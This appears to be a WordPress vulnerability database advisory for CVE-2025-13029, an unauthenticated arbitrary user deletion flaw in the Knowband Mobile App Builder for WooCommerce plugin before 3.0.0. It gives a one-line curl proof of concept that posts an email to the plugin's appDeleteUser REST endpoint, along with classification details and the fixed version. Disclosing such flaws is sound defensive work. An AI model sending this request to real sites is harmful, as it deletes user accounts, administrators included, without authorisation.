Knowband Mobile App Builder for wooCommerce < 3.0.0 – Unauthenticated Arbitrary User Deletion | CVE 2025-13029

Description

The plugin does not have authorisation when deleting users via its REST API, allowing unauthenticated attackers to delete arbitrary users.

Proof of Concept

Note: WooCommerce Plugin must also be active.

curl -s -X POST "http://example.com/wp-json/wmab/v2.0/appDeleteUser/" -d "email=admin@example.com"

Where "admin@example.com" is a valid user email.

Affects Plugins

knowband-mobile-app-builder-for-woocommerce

Fixed in 3.0.0

References

CVE

CVE-2025-13029

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CWE-862

CVSS

8.2 (high)

Miscellaneous

Original Researcher

Khaled Alenazi (Nxploited)

Submitter

Khaled Alenazi (Nxploited)

Verified

Yes

WPVDB ID

22344534-cd36-4817-b683-c0af55759e01

Timeline

Publicly Published

2025-12-10 (about 21 days ago)

Added

2025-12-10 (about 20 days ago)

Last Updated

2025-12-10 (about 20 days ago)

Other

Published

Title

Published

2025-06-27

Title

PlatiOnline Payments <= 6.3.2 - Missing Authorization

Published

2023-01-10

Title

Royal Elementor Addons < 1.3.60 - Subscriber+ Arbitrary Template Import

Published

2025-09-29

Title

Smart WeTransfer <= 1.3 - Missing Authorization

Published

2023-10-16

Title

DX Delete Attached Media < 2.0.6 - Settings Update via CSRF

Published

2025-11-17

Title

ACF Flexible Layouts Manager <= 1.1.6 - Missing Authorization to Unauthenticated Custom Field Update